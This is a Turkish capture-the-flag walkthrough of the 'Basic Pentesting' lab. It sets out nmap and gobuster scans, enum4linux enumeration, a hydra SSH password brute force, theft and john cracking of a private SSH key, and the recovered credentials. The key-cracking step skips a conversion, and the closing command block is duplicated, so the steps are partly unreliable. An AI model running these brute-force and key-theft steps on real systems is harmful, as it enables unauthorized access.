- 28 Nis 2022
- 105
- 84
Merhabalar Bugün Tekrardan Ctf Çözeceğim İzninizle Başlıyorum
BASİC PENTESTİNG
Terminal
(ovpn bağlandıktan sonra yapılışı önceki konuda anlatmıştım)
nmap -sS -sV -sC -O -Pn ipadresi (versiyon işletim sistemi port v.s taraması yapar)
(tarama sonuçları uzun sürebilir beklemeniz gerek)
evet sonuçlar geldi ssh shell almaya çalışacağız şimdi bu ip adresinde directory arayalım gobuster aracını kullanacağız
TERMİNAL
gobuster dir -u ipadresi -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
ve sonuçları bekleyelim yine uzun sürebilir
development geldi ipadresi://development girelim
evet burda şifreli bir konuşma bulduk
TERMİNAL
enum4linux -a ipadresi
SONUÇLAR
YENİ TERMİNAL SAYFASI
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://ipadresi -VV (sonuçlar burda çok uzun gelir)
clear
ssh jan@ipadresi
yes
armando
clear
ls
ls -la
cat .lesshst
cd ..
ls
cd kay/
ls
cat pass.bak
clear
ls -la
cd .ssh
ls
ssh -i id_rsa kay@ipadresi
yes
burda parolasız girecektik ama parola isteyecek nanodan ayar yapmamız lazım
clear
cat id rsa
Buradaki metni yeni bir sayfa açıp
cd Downloads
ls
nano id rsa açın
kopyaladığınız metni buraya yapıştırın
ctrl o
ctrl x
chmod 600 id rsa (yetki verdik)
clear
john --wordlist=/usr/share/wordlists/rockyou.txt john.txt.
parola gg oldu
parola (beeswax)
ssh -i id_rsa kay@ipadresi
yes
beeswax
ls
cat pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
whoami
kay
cd Downloads
ls
nano id rsa açın
kopyaladığınız metni buraya yapıştırın
ctrl o
ctrl x
chmod 600 id rsa (yetki verdik)
clear
john --wordlist=/usr/share/wordlists/rockyou.txt john.txt.
parola gg oldu
parola (beeswax)
ssh -i id_rsa kay@ipadresi
yes
beeswax
ls
cat pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
whoami
kay